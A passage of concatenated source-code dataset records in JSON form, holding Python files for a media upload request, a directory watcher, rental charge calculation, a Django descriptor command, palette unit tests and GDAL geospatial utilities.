\"mobileThunderSubscription\",\n \"deviceId\": str(g.device_id),\n \"appId\": config.appId,\n \"callId\": int(\n time.time() *\n 1000)}\n sig = gen_sig(payload, config.secret)\n payload['sig'] = sig\n status, output = curl.openurl(config.login_url, postdata=urllib.urlencode(\n payload), header={'Content-Type': 'application/x-www-form-urlencoded'})\n if int(status) != 200:\n return cons.CODE_FAIL, None\n data = json.loads(output)\n code = data.get('code', 0)\n if int(code) != 0:\n return 'auth fail', None\n userSecretkey = data.get('userSecretKey')\n t = data.get('t')\n file = {\n \"gcid\": str(gcid),\n \"path\": gcid + '.mp4',\n \"size\": int(size),\n \"createTime\": int(time.time() * 1000),\n \"title\": title\n }\n\n payload = {\n \"uploadMethod\": \"user\",\n \"files\": json.dumps([file]),\n \"appId\": config.appId,\n \"callId\": int(\n time.time() * 1000),\n \"t\": t}\n sig = gen_sig(payload, config.secret + userSecretkey)\n payload['sig'] = sig\n status, output = curl.openurl(config.request_url, postdata=urllib.urlencode(\n payload), header={'Content-Type': 'application/x-www-form-urlencoded'})\n if int(status) != 200:\n return cons.CODE_FAIL, None\n data = json.loads(output)\n code = data.get('code', 0)\n if int(code) != 0:\n return cons.CODE_FAIL, None\n return cons.CODE_OK, 1\n\n","sub_path":"scripts/commit_media.py","file_name":"commit_media.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"125204038","text":"#!/usr/bin/python3.5\n# python3 watcher.py 'temp' 'php -f script.php'\n\nimport os\nimport sys\nimport json\nimport time\nimport fcntl\nimport signal\n\n\nFNAME = False\nSYSCOMMAND = False\narguments = sys.argv[1:]\n\n\ndef to_path(path):\n _path = path\n if path[-1] is not '/':\n _path = path + '/'\n return _path\n\n\ndef parse_json_file(file):\n directory = False\n command = False\n try:\n with open(arguments[0], 'r') as file:\n config = json.load(file)\n except FileNotFoundError:\n print('[watcher] Error. File Not Found \"%s\"' % (file))\n else:\n try:\n directory = to_path(config['watcher_directory'])\n command = config['watcher_command']\n except KeyError:\n print('[watcher] Config not find keys \"watcher_directory\" or \"watcher_command\"')\n return {'directory': directory, 'command': command}\n\n\nif len(arguments) is 2:\n FNAME = to_path(arguments[0])\n SYSCOMMAND = arguments[1]\nelif len(arguments) is 1 and os.path.isfile(arguments[0]):\n config = parse_json_file(arguments[0])\n FNAME = config['directory']\n SYSCOMMAND = config['command']\nelif os.path.isfile('config.json'):\n config = parse_json_file('config.json')\n FNAME = config['directory']\n SYSCOMMAND = config['command']\n\n\nif os.path.exists(FNAME) is False:\n print('[watcher] Path not exist \"%s\". Exit' % (FNAME))\n exit()\nelif SYSCOMMAND is False:\n print('[watcher] Command not find. Exit')\n exit()\nelse:\n print('[watcher] start')\n\n\ndef handler(signum, frame):\n try:\n print('[watcher] Catch changes \"%s\". run \"%s\"' % (FNAME, SYSCOMMAND))\n os.system(SYSCOMMAND)\n except RuntimeError:\n pass\n\n\n# FileNotFoundError:\nfd = os.open(FNAME, os.O_RDONLY)\nfcntl.fcntl(fd, fcntl.F_NOTIFY, fcntl.DN_MODIFY | fcntl.DN_MULTISHOT)\n\nsignal.signal(signal.SIGIO, handler)\n\nwhile True:\n time.sleep(1000)\n","sub_path":"jsmb_nodemanager/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"579812346","text":"\"\"\"\nReturns total price paid for individual rentals\n\"\"\"\nimport argparse\nimport json\nimport datetime\nimport math\nimport logging\n\n\ndef logged_func(func):\n \"\"\"Decorator function\"\"\"\n def log_debug(debug, *args, **kwargs):\n \"\"\"Function to enable the required debugging level\"\"\"\n #logging.debug(ARGS)\n log_format = \"%(asctime)s %(filename)s:%(lineno)-3d %(levelname)s %(message)s\"\n log_file = datetime.datetime.now().strftime('%Y-%m-%d') + '_charges_calc.log'\n formatter = logging.Formatter(log_format)\n\n file_handler = logging.FileHandler(log_file)\n file_handler.setFormatter(formatter)\n\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(formatter)\n\n logger = logging.getLogger()\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n debug_level = debug\n if debug_level == 0:\n # This will disable all the logging\n logger.disabled = True\n file_handler.disabled = True\n elif debug_level == 1:\n # \"\"\"Error messages; This prints error and above messages\"\"\"\n logger.setLevel(logging.ERROR)\n console_handler.setLevel(logging.ERROR)\n file_handler.setLevel(logging.ERROR)\n elif debug_level == 2:\n # \"\"\"WARNING messages print to console and file;\n # Tis prints Warning and above messages\"\"\"\n logger.setLevel(logging.WARNING)\n console_handler.setLevel(logging.WARNING)\n file_handler.setLevel(logging.WARNING)\n elif debug_level == 3:\n # \"\"\"DEBUG messages print to console and warning messages to file;\n # This prints debug and above messages\"\"\"\n logger.setLevel(logging.DEBUG)\n console_handler.setLevel(logging.DEBUG)\n file_handler.setLevel(logging.WARNING)\n return func(*args, **kwargs)\n return log_debug\n\n\n# def log_debug(debug):\n# \"\"\"Function to enable the required debugging level\"\"\"\n# log_format = \"%(asctime)s %(filename)s:%(lineno)-3d %(levelname)s %(message)s\"\n# log_file = datetime.datetime.now().strftime('%Y-%m-%d') + '_charges_calc.log'\n# formatter = logging.Formatter(log_format)\n#\n# file_handler = logging.FileHandler(log_file)\n# file_handler.setFormatter(formatter)\n#\n# console_handler = logging.StreamHandler()\n# console_handler.setLevel(logging.DEBUG)\n# console_handler.setFormatter(formatter)\n#\n# logger = logging.getLogger()\n# logger.addHandler(file_handler)\n# logger.addHandler(console_handler)\n#\n# debug_level = debug\n# if debug_level == 0:\n# #This will disable all the logging\n# logger.disabled = True\n# file_handler.disabled = True\n# elif debug_level == 1:\n# #\"\"\"Error messages; This prints error and above messages\"\"\"\n# logger.setLevel(logging.ERROR)\n# console_handler.setLevel(logging.ERROR)\n# file_handler.setLevel(logging.ERROR)\n# elif debug_level == 2:\n# #\"\"\"WARNING messages print to console and file; Tis prints Warning and above messages\"\"\"\n# logger.setLevel(logging.WARNING)\n# console_handler.setLevel(logging.WARNING)\n# file_handler.setLevel(logging.WARNING)\n# elif debug_level == 3:\n# #\"\"\"DEBUG messages print to console and warning messages to file;\n# #This prints debug and above messages\"\"\"\n# logger.setLevel(logging.DEBUG)\n# console_handler.setLevel(logging.DEBUG)\n# file_handler.setLevel(logging.WARNING)\n\n\ndef parse_cmd_arguments():\n \"\"\"Required and optional arguments by the user\"\"\"\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', help='input JSON file', required=True)\n parser.add_argument('-o', '--output', help='ouput JSON file', required=True)\n parser.add_argument('-d', '--debug', help='debug messages', type=int, default=0)\n\n return parser.parse_args()\n\n\n@logged_func\ndef load_rentals_file(filename):\n \"\"\"Function to load the json file\"\"\"\n with open(filename) as file:\n try:\n logging.debug(\"loading the json data file\")\n data = json.load(file)\n #logging.debug(\"complete json data {}\".format(data))\n except FileNotFoundError:\n logging.error(\"File not found\")\n exit(0)\n return data\n\n\n@logged_func\ndef calculate_additional_fields(data):\n \"\"\"Function to calculate the required fields\"\"\"\n for value in data.values():\n logging.debug(\"calculate_additional_fields function is called from main\")\n logging.debug(f\"First value of the data {value}\")\n try:\n rental_start = datetime.datetime.strptime(value['rental_start'], '%m/%d/%y')\n logging.debug(\"Getting the rental start time\")\n logging.debug(f\"Rental start period is {rental_start}\")\n rental_end = datetime.datetime.strptime(value['rental_end'], '%m/%d/%y')\n logging.debug(\"Getting the rental end time\")\n logging.debug(f\"Rental end period is {rental_end}\")\n except ValueError:\n logging.debug(\"Incorrect rental start and end date formats\")\n value['total_days'] = (rental_end - rental_start).days\n if value['total_days'] < 0:\n logging.debug(f\"total period of rental is {value['total_days']}\")\n logging.warning(f\"Rental start and end periods \"\n f\"are incorrect for {value['product_code']}\")\n try:\n value['total_price'] = value['total_days'] * value['price_per_day']\n value['sqrt_total_price'] = math.sqrt(value['total_price'])\n except ValueError:\n logging.warning(f\"Cannot do square root for a \"\n f\"negative number{value['total_price']}\")\n logging.debug(f\"Cannot do square root for a negative number{value['total_price']}\")\n try:\n value['unit_cost'] = value['total_price'] / value['units_rented']\n except ZeroDivisionError:\n logging.debug(\"Units rented cannot be zero\")\n\n return data\n\n\ndef save_to_json(filename, data):\n \"\"\"Function to save the data after calculating the required fields\"\"\"\n with open(filename, 'w') as file:\n json.dump(data, file)\n #logging.debug(\"complete json data {}\".format(data))\n\n\nif __name__ == \"__main__\":\n ARGS = parse_cmd_arguments()\n # log_debug(ARGS.debug)\n # logging.debug(ARGS)\n DATA = load_rentals_file(ARGS.debug, ARGS.input)\n NEW_DATA = calculate_additional_fields(ARGS.debug, DATA)\n save_to_json(ARGS.output, NEW_DATA)\n","sub_path":"students/g_rama/lesson09/charges_calc.py","file_name":"charges_calc.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"308750010","text":"\"\"\"Recalculate the descriptors for all compounds and reactions.\"\"\"\nfrom django.core.management.base import BaseCommand\nfrom DRP.models import Reaction, Compound\nfrom django import db\nimport warnings\n\n\nclass Command(BaseCommand):\n\n \"\"\"Recalculate the descriptors for all compounds and reactions.\"\"\"\n\n help = 'Recalculate the descriptors for all compounds and reactions.'\n\n def add_arguments(self, parser):\n \"\"\"Add arguments for the parser.\"\"\"\n parser.fromfile_prefix_chars = '@'\n parser.epilog = \"Prefix arguments with '@' to specify a file containing newline-separated values for that argument. e.g.'-w @whitelist_headers.txt' to pass multiple descriptors from a file as whitelist.\"\n\n parser.add_argument('start', type=int, default=0, nargs='?',\n help='pk of starting point. Indicates compound pk unless --reactions is specified')\n parser.add_argument('-e', '--error-level', nargs='?', default=0, const=3, type=int,\n help='Make warnings errors instead. '\n '0 leaves python default settings '\n '(or whatever settings are specified by the command line flags when calling python). '\n '1 makes only RuntimeWarnings errors. '\n '2 makes Runtime and User Warnings errors. '\n '3 makes all warnings errors.')\n parser.add_argument('-p', '--plugins', nargs='+',\n help='Plugins to use (default all).')\n parser.add_argument('-w', '--whitelist', nargs='+',\n help='One or more descriptor headers to calculate from specified plugins (default all for given plugins).')\n group = parser.add_mutually_exclusive_group(required=False)\n group.add_argument('-r', '--reactions', '--rxns', action='store_true',\n help='Calculate descriptors for reactions only.')\n group.add_argument('-c', '--compounds', action='store_true',\n help='Calculate descriptors for compounds only.')\n group.add_argument('--include-invalid', action='store_true',\n help='Calculate descriptors for invalid reactions also.')\n group.add_argument('--include-non-performed', action='store_true',\n help='Calculate descriptors for non-performed reactions also.')\n\n def handle(self, *args, **kwargs):\n \"\"\"Handle the function call.\"\"\"\n verbose = (kwargs['verbosity'] > 0)\n only_reactions = kwargs['reactions']\n only_compounds = kwargs['compounds']\n start = kwargs['start']\n whitelist = kwargs['whitelist']\n plugins = kwargs['plugins']\n include_invalid = kwargs['include_invalid']\n include_non_performed = kwargs['include_non_performed']\n\n if whitelist is not None:\n # just a little optimization\n whitelist = set(whitelist)\n\n if kwargs['error_level'] == 1:\n warnings.simplefilter('error', RuntimeWarning)\n if kwargs['error_level'] == 2:\n warnings.simplefilter('error', UserWarning)\n warnings.simplefilter('error', RuntimeWarning)\n if kwargs['error_level'] == 3:\n warnings.simplefilter('error')\n\n if not only_reactions:\n Compound.objects.order_by('pk').filter(pk__gte=start).calculate_descriptors(\n verbose=verbose, whitelist=whitelist, plugins=plugins)\n if not only_compounds:\n reactions = Reaction.objects.order_by('pk')\n if only_reactions:\n reactions = reactions.filter(pk__gte=start)\n if not include_invalid:\n reactions = reactions.exclude(performedreaction__valid=False)\n if not include_non_performed:\n reactions = reactions.exclude(performedreaction=None)\n reactions.calculate_descriptors(\n verbose=verbose, whitelist=whitelist, plugins=plugins)\n","sub_path":"DRP/management/commands/calculate_descriptors.py","file_name":"calculate_descriptors.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"445937752","text":"#\n# This file is part of BEAVr, https://github.com/theoryinpractice/beavr/, and is\n# Copyright (C) North Carolina State University, 2016. It is licensed under\n# the three-clause BSD license; see LICENSE.\n#\n\nimport unittest\nfrom beavr import util\n\nclass TestUtil(unittest.TestCase):\n\n def setUp(self):\n \"\"\" Sets up the necessary data structures and variables before tests are run \"\"\"\n\n def tearDown(self):\n \"\"\" Cleans up after tests are run \"\"\"\n\n def test_load_palette(self):\n \"\"\" Tests load_palette \"\"\"\n expected_first = [0.89411764,0.10196078,0.10980392]\n expected_last = [0.8,0.8,0.8]\n expected_length = 74\n\n color_palette = util.load_palette(\"brewer\")\n \n actual_length = len(color_palette)\n actual_first = color_palette[0]\n actual_last = color_palette[-1]\n\n self.assertEqual(expected_length, actual_length,\n msg=\"Number of colors in palette\")\n\n self.assertEqual(3, len(color_palette[0]), \n msg=\"Ensuring colors have 3 values for RGB format\")\n\n for exp, act in zip(expected_first, actual_first):\n diff = abs(exp - act)\n self.assertTrue(diff < 0.0001, msg=\"First color in palette\" +\\\n \"\\n Expected: \" + str(expected_first) + \\\n \"\\n Actual: \" + str(actual_first))\n\n for exp, act in zip(expected_last, actual_last):\n diff = abs(exp - act)\n self.assertTrue(diff < 0.0001, msg=\"First color in palette\" +\\\n \"\\n Expected: \" + str(expected_last) + \\\n \"\\n Actual: \" + str(actual_last))\n\n def test_map_colorings(self):\n \"\"\" Tests map_colorings\"\"\"\n colorings = [[7, 3, 6, 2, 0], [1, 3, 7, 5]]\n color_palette = [(a,b,c) for a in [0,1] for b in [0,1] for c in [0,1]]\n expected_mapped = [[(1,1,1), (0,1,1), (1,1,0), (0,1,0), (0,0,0)],\n [(0,0,1), (0,1,1), (1,1,1), (1,0,1)]]\n \n actual_mapped = util.map_colorings(color_palette, colorings)\n\n for exp_map_col, act_map_col in zip(expected_mapped, actual_mapped):\n for exp, act in zip(exp_map_col, act_map_col):\n self.assertEqual(exp, act, msg=\"Mapped colorings\" +\\\n \"\\n Expected: \" + str(exp_map_col) +\\\n \"\\n Actual: \" + str(act_map_col))\n\n def test_map_coloring(self):\n \"\"\" Tests map_coloring\"\"\"\n coloring = [7, 3, 6, 2, 0]\n color_palette = [(a,b,c) for a in [0,1] for b in [0,1] for c in [0,1]]\n expected_mapped = [(1,1,1), (0,1,1), (1,1,0), (0,1,0), (0,0,0)]\n \n actual_mapped = util.map_coloring(color_palette, coloring)\n\n for exp, act in zip(expected_mapped, actual_mapped):\n self.assertEqual(exp, act, msg=\"Mapped coloring\" +\\\n \"\\n Expected: \" + str(expected_mapped) +\\\n \"\\n Actual: \" + str(actual_mapped))\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(TestUtil)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"unittests/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42511464","text":"# vim: set fileencoding=utf-8\n# pylint: disable=C0103\n\n\"\"\"\nWrappers for gdal and rasterio.\n\nCopyright (C) 2018, Carlo de Franchis \n\"\"\"\n\nfrom __future__ import print_function\nimport os\nimport re\nimport errno\nimport shutil\nimport argparse\nimport datetime\nimport subprocess\nimport tempfile\nimport tifffile\nfrom osgeo import gdal, osr\nimport numpy as np\nimport utm\nimport traceback\nimport warnings\nimport sys\nimport geojson\nimport requests\nimport shapely.geometry\nimport rasterio\ngdal.UseExceptions()\n\nimport rpc_model\n\n\nwarnings.filterwarnings(\"ignore\",\n category=rasterio.errors.NotGeoreferencedWarning)\n\n\ndef download(from_url, to_file, auth=('', '')):\n \"\"\"\n Download a file from an url to a file.\n \"\"\"\n mkdir_p(os.path.dirname(to_file))\n response = requests.get(from_url, stream=True, auth=auth)\n with open(to_file, 'wb') as handle:\n for data in response.iter_content():\n handle.write(data)\n\n\ndef valid_datetime(s):\n \"\"\"\n Check if a string is a well-formatted datetime.\n \"\"\"\n try:\n return datetime.datetime.strptime(s, \"%Y-%m-%d\")\n except ValueError:\n raise argparse.ArgumentTypeError(\"Invalid date: '{}'\".format(s))\n\n\ndef valid_date(s):\n \"\"\"\n Check if a string is a well-formatted date.\n \"\"\"\n try:\n return datetime.datetime.strptime(s, \"%Y-%m-%d\").date()\n except ValueError:\n raise argparse.ArgumentTypeError(\"Invalid date: '{}'\".format(s))\n\n\ndef valid_lon(s):\n \"\"\"\n Check if a string is a well-formatted longitude.\n \"\"\"\n try:\n return float(s)\n except ValueError:\n regex = r\"(\\d+)d(\\d+)'([\\d.]+)\\\"([WE])\"\n m = re.match(regex, s)\n if m is None:\n raise argparse.ArgumentTypeError(\"Invalid longitude: '{}'\".format(s))\n else:\n x = m.groups()\n lon = int(x[0]) + float(x[1]) / 60 + float(x[2]) / 3600\n if x[3] == 'W':\n lon *= -1\n return lon\n\n\ndef valid_lat(s):\n \"\"\"\n Check if a string is a well-formatted latitude.\n \"\"\"\n try:\n return float(s)\n except ValueError:\n regex = r\"(\\d+)d(\\d+)'([\\d.]+)\\\"([NS])\"\n m = re.match(regex, s)\n if m is None:\n raise argparse.ArgumentTypeError(\"Invalid latitude: '{}'\".format(s))\n else:\n x = m.groups()\n lat = int(x[0]) + float(x[1]) / 60 + float(x[2]) / 3600\n if x[3] == 'S':\n lat *= -1\n return lat\n\n\ndef valid_geojson(filepath):\n \"\"\"\n Check if a file contains valid geojson.\n \"\"\"\n with open(filepath, 'r') as f:\n geo = geojson.load(f)\n if type(geo) == geojson.geometry.Polygon:\n return geo\n if type(geo) == geojson.feature.FeatureCollection:\n p = geo['features'][0]['geometry']\n if type(p) == geojson.geometry.Polygon:\n return p\n raise argparse.ArgumentTypeError('Invalid geojson: only polygons are supported')\n\n\ndef geojson_geometry_object(lat, lon, w, h):\n \"\"\"\n \"\"\"\n return geojson.Polygon([lonlat_rectangle_centered_at(lon, lat, w, h)])\n\n\ndef is_valid(f):\n \"\"\"\n Check if a path is a valid image file according to gdal.\n \"\"\"\n try:\n a = gdal.Open(f); a = None # gdal way of closing files\n return True\n except RuntimeError:\n return False\n\n\ndef tmpfile(ext=''):\n \"\"\"\n Creates a temporary file.\n\n Args:\n ext: desired file extension. The dot has to be included.\n\n Returns:\n absolute path to the created file\n \"\"\"\n fd, out = tempfile.mkstemp(suffix=ext)\n os.close(fd) # http://www.logilab.org/blogentry/17873\n return out\n\n\ndef mkdir_p(path):\n \"\"\"\n Create a directory without complaining if it already exists.\n \"\"\"\n if path:\n try:\n os.makedirs(path)\n except OSError as exc: # requires Python > 2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\ndef pixel_size(filename):\n \"\"\"\n Read the resolution (in meters per pixel) of a geotif image.\n \"\"\"\n f = gdal.Open(filename)\n if f is None:\n print('WARNING: Unable to open {} for reading'.format(filename))\n return\n try:\n # GetGeoTransform give a 6-uple containing tx, rx, 0, ty, 0, ry\n resolution = np.array(f.GetGeoTransform())[[1, 5]]\n except AttributeError:\n print('WARNING: Unable to retrieve {} GeoTransform'.format(filename))\n return\n f = None # gdal way of closing files\n return resolution[0], -resolution[1] # for gdal, ry < 0\n\n\ndef set_geotif_metadata(filename, geotransform=None, projection=None,\n metadata=None):\n \"\"\"\n Write some metadata (using GDAL) to the header of a geotif file.\n\n Args:\n filename: path to the file where the information has to be written\n geotransform, projection: gdal geographic information\n metadata: dictionary written to the GDAL 'Metadata' tag. It can be used\n to store any extra metadata (e.g. acquisition date, sun azimuth...)\n \"\"\"\n f = gdal.Open(filename, gdal.GA_Update)\n if f is None:\n print('Unable to open {} for writing'.format(filename))\n return\n\n if geotransform is not None and geotransform != (0, 1, 0, 0, 0, 1):\n f.SetGeoTransform(geotransform)\n\n if projection is not None and projection != '':\n f.SetProjection(projection)\n\n if metadata is not None:\n f.SetMetadata(metadata)\n\n\ndef set_geotif_metadata_item(filename, tagname, tagvalue):\n \"\"\"\n Append a key, value pair to the GDAL metadata tag to a geotif file.\n \"\"\"\n dataset = gdal.Open(filename, gdal.GA_Update)\n if dataset is None:\n print('Unable to open {} for writing'.format(filename))\n return\n\n dataset.SetMetadataItem(tagname, tagvalue)\n\n\ndef merge_bands(infiles, outfile):\n \"\"\"\n Produce a multi-band tiff file from a sequence of mono-band tiff files.\n\n Args:\n infiles: list of paths to the input mono-bands images\n outfile: path to the ouput multi-band image file\n \"\"\"\n tifffile.imsave(outfile, np.dstack(tifffile.imread(f) for f in infiles))\n\n\ndef inplace_utm_reprojection_with_gdalwarp(src, utm_zone, ulx, uly, lrx, lry):\n \"\"\"\n \"\"\"\n img = gdal.Open(src)\n s = img.GetProjection() # read geographic metadata\n img = None # gdal way of closing files\n x = s.lower().split('utm zone ')[1][:2] # hack to extract the UTM zone number\n if int(x) != utm_zone:\n\n # hack to allow the output to overwrite the input\n fd, dst = tempfile.mkstemp(suffix='.tif', dir=os.path.dirname(src))\n os.close(fd)\n\n cmd = ['gdalwarp', '-t_srs', '+proj=utm +zone={}'.format(utm_zone),\n '-te', str(ulx), str(lry), str(lrx), str(uly), # xmin ymin xmax ymax\n '-overwrite', src, dst]\n print(' '.join(cmd))\n try:\n #print(' '.join(cmd))\n subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n shutil.move(dst, src)\n except subprocess.CalledProcessError as e:\n print('ERROR: this command failed')\n print(' '.join(cmd))\n print(e.output)\n\n\ndef crop_georeferenced_image(out_path, in_path, lon, lat, w, h):\n \"\"\"\n Crop an image around a given geographic location.\n\n Args:\n out_path: path to the output (cropped) image file\n in_path: path to the input image file\n lon, lat: longitude and latitude of the center of the crop\n w, h: width and height of the crop, in meters\n \"\"\"\n # compute utm geographic coordinates of the crop\n cx, cy = utm.from_latlon(lat, lon)[:2]\n ulx = cx - w / 2\n lrx = cx + w / 2\n uly = cy + h / 2 # in UTM the y coordinate increases from south to north\n lry = cy - h / 2\n\n if out_path == in_path: # hack to allow the output to overwrite the input\n fd, tmp = tempfile.mkstemp(suffix='.tif', dir=os.path.dirname(in_path))\n os.close(fd)\n subprocess.check_output(['gdal_translate', in_path, tmp, '-ot',\n 'UInt16', '-projwin', str(ulx), str(uly),\n str(lrx), str(lry)])\n shutil.move(tmp, out_path)\n else:\n subprocess.check_output(['gdal_translate', in_path, out_path, '-ot',\n 'UInt16', '-projwin', str(ulx), str(uly),\n str(lrx), str(lry)])\n\n\ndef gdal_translate_version():\n \"\"\"\n \"\"\"\n v = subprocess.check_output(['gdal_translate', '--version'])\n return v.decode().split()[1].split(',')[0]\n\n\ndef crop_with_gdal_translate(outpath, inpath, ulx, uly, lrx, lry,\n utm_zone=None, lat_band=None, output_type=None):\n \"\"\"\n \"\"\"\n if outpath == inpath: # hack to allow the output to overwrite the input\n fd, out = tempfile.mkstemp(suffix='.tif', dir=os.path.dirname(inpath))\n os.close(fd)\n else:\n out = outpath\n\n env = os.environ.copy()\n if inpath.startswith(('http://', 'https://')):\n env['CPL_VSIL_CURL_ALLOWED_EXTENSIONS'] = inpath[-3:]\n env['GDAL_DISABLE_READDIR_ON_OPEN'] = 'TRUE'\n env['VSI_CACHE'] = 'TRUE'\n path = '/vsicurl/{}'.format(inpath)\n elif inpath.startswith('s3://'):\n env['CPL_VSIL_CURL_ALLOWED_EXTENSIONS'] = inpath[-3:]\n env['GDAL_DISABLE_READDIR_ON_OPEN'] = 'TRUE'\n env['VSI_CACHE'] = 'TRUE'\n env['AWS_REQUEST_PAYER'] = 'requester'\n path = '/vsis3/{}'.format(inpath[len('s3://'):])\n else:\n path = inpath\n\n cmd = ['gdal_translate', path, out, '-of', 'GTiff', '-projwin', str(ulx),\n str(uly), str(lrx), str(lry)]\n if output_type is not None:\n cmd += ['-ot', output_type]\n if utm_zone is not None:\n if gdal_translate_version() < '2.0':\n print('WARNING: utils.crop_with_gdal_translate argument utm_zone requires gdal >= 2.0')\n else:\n srs = '+proj=utm +zone={}'.format(utm_zone)\n # latitude bands in the southern hemisphere range from 'C' to 'M'\n if lat_band and lat_band < 'N':\n srs += ' +south'\n cmd += ['-projwin_srs', srs]\n try:\n #print(' '.join(cmd))\n subprocess.check_output(cmd, stderr=subprocess.STDOUT, env=env)\n except subprocess.CalledProcessError as e:\n if inpath.startswith(('http://', 'https://')):\n if not requests.head(inpath).ok:\n print('{} is not available'.format(inpath))\n return\n print('ERROR: this command failed')\n print(' '.join(cmd))\n print(e.output)\n return\n\n if outpath == inpath: # hack to allow the output to overwrite the input\n shutil.move(out, outpath)\n\n\ndef crop_with_gdalwarp(outpath, inpath, geojson_path):\n \"\"\"\n \"\"\"\n cmd = ['gdalwarp', inpath, outpath, '-ot', 'UInt16', '-of', 'GTiff',\n '-overwrite', '-crop_to_cutline', '-cutline', geojson_path]\n subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n\n\ndef get_image_utm_zone(img_path):\n \"\"\"\n Read the UTM zone from a geotif metadata.\n \"\"\"\n img = gdal.Open(img_path)\n s = img.GetProjection() # read geographic metadata\n img = None # gdal way of closing files\n return s.lower().split('utm zone ')[1][:2]\n\n\ndef geojson_lonlat_to_utm(aoi):\n \"\"\"\n \"\"\"\n # compute the utm zone number of the first polygon vertex\n lon, lat = aoi['coordinates'][0][0]\n utm_zone = utm.from_latlon(lat, lon)[2]\n\n # convert all polygon vertices coordinates from (lon, lat) to utm\n c = []\n for lon, lat in aoi['coordinates'][0]:\n c.append(utm.from_latlon(lat, lon, force_zone_number=utm_zone)[:2])\n\n return geojson.Polygon([c])\n\n\ndef utm_bbx(aoi, utm_zone=None, r=None):\n \"\"\"\n \"\"\"\n lon, lat = aoi['coordinates'][0][0]\n if utm_zone is None: # compute the utm zone number of the first vertex\n utm_zone, lat_band = utm.from_latlon(lat, lon)[2:]\n else:\n lat_band = utm.from_latlon(lat, lon, force_zone_number=utm_zone)[3]\n\n # convert all polygon vertices coordinates from (lon, lat) to utm\n c = []\n for lon, lat in aoi['coordinates'][0]:\n c.append(utm.from_latlon(lat, lon, force_zone_number=utm_zone)[:2])\n\n # utm bounding box\n bbx = shapely.geometry.Polygon(c).bounds # minx, miny, maxx, maxy\n ulx, uly, lrx, lry = bbx[0], bbx[3], bbx[2], bbx[1] # minx, maxy, maxx, miny\n\n if r is not None: # round to multiples of the given resolution\n ulx = r * np.round(ulx / r)\n uly = r * np.round(uly / r)\n lrx = r * np.round(lrx / r)\n lry = r * np.round(lry / r)\n\n return ulx, uly, lrx, lry, utm_zone, lat_band\n\n\ndef latlon_to_pix(img, lat, lon):\n \"\"\"\n Get the pixel coordinates of a geographic location in a georeferenced image.\n\n Args:\n img: path to the input image\n lat, lon: geographic coordinates of the input location\n\n Returns:\n x, y: pixel coordinates\n \"\"\"\n # load the image dataset\n ds = gdal.Open(img)\n\n # get a geo-transform of the dataset\n try:\n gt = ds.GetGeoTransform()\n except AttributeError:\n return 0, 0\n\n # create a spatial reference object for the dataset\n srs = osr.SpatialReference()\n srs.ImportFromWkt(ds.GetProjection())\n\n # set up the coordinate transformation object\n ct = osr.CoordinateTransformation(srs.CloneGeogCS(), srs)\n\n # change the point locations into the GeoTransform space\n point1, point0 = ct.TransformPoint(lon, lat)[:2]\n\n # translate the x and y coordinates into pixel values\n x = (point1 - gt[0]) / gt[1]\n y = (point0 - gt[3]) / gt[5]\n return int(x), int(y)\n\n\ndef latlon_rectangle_centered_at(lat, lon, w, h):\n \"\"\"\n \"\"\"\n x, y, number, letter = utm.from_latlon(lat, lon)\n rectangle = []\n rectangle.append(utm.to_latlon(x - .5*w, y - .5*h, number, letter))\n rectangle.append(utm.to_latlon(x - .5*w, y + .5*h, number, letter))\n rectangle.append(utm.to_latlon(x + .5*w, y + .5*h, number, letter))\n rectangle.append(utm.to_latlon(x + .5*w, y - .5*h, number, letter))\n rectangle.append(rectangle[0]) # close the polygon\n return rectangle\n\n\ndef lonlat_rectangle_centered_at(lon, lat, w, h):\n \"\"\"\n \"\"\"\n return [p[::-1] for p in latlon_rectangle_centered_at(lat, lon, w, h)]\n\n\ndef print_elapsed_time(since_first_call=False):\n \"\"\"\n Print the elapsed time since the last call or since the first call.\n\n Args:\n since_first_call:\n \"\"\"\n t2 = datetime.datetime.now()\n if since_first_call:\n print(\"Total elapsed time:\", t2 - print_elapsed_time.t0)\n else:\n try:\n print(\"Elapsed time:\", t2 - print_elapsed_time.t1)\n except AttributeError:\n print(\"Elapsed time:\", t2 - print_elapsed_time.t0)\n print_elapsed_time.t1 = t2\n print()\n\n\n#def show(img):\n# \"\"\"\n# \"\"\"\n# fig, ax = plt.subplots()\n# ax.imshow(img, interpolation='nearest')\n#\n# def format_coord(x, y):\n# col = int(x + 0.5)\n# row = int(y + 0.5)\n# if col >= 0 and col < img.shape[1] and row >= 0 and row < img.shape[0]:\n# z = img[row, col]\n# return 'x={}, y={}, z={}'.format(col, row, z)\n# else:\n# return 'x={}, y={}'.format(col, row)\n#\n# ax.format_coord = format_coord\n# plt.show()\n\n\ndef warn_with_traceback(message, category, filename, lineno, file=None,\n line=None):\n traceback.print_stack()\n log = file if hasattr(file,'write') else sys.stderr\n log.write(warnings.formatwarning(message, category, filename, lineno, line))\n\n#warnings.showwarning = warn_with_traceback\n\n\ndef bounding_box2D(pts):\n \"\"\"\n bounding box for the points pts\n \"\"\"\n dim = len(pts[0]) # should be 2\n bb_min = [min([t[i] for t in pts]) for i in range(dim)]\n bb_max = [max([t[i] for t in pts]) for i in range(dim)]\n return bb_min[0], bb_min[1], bb_max[0] - bb_min[0], bb_max[1] - bb_min[1]\n\n\ndef rpc_from_geotiff(geotiff_path):\n \"\"\"\n \"\"\"\n with rasterio.open(geotiff_path, 'r') as 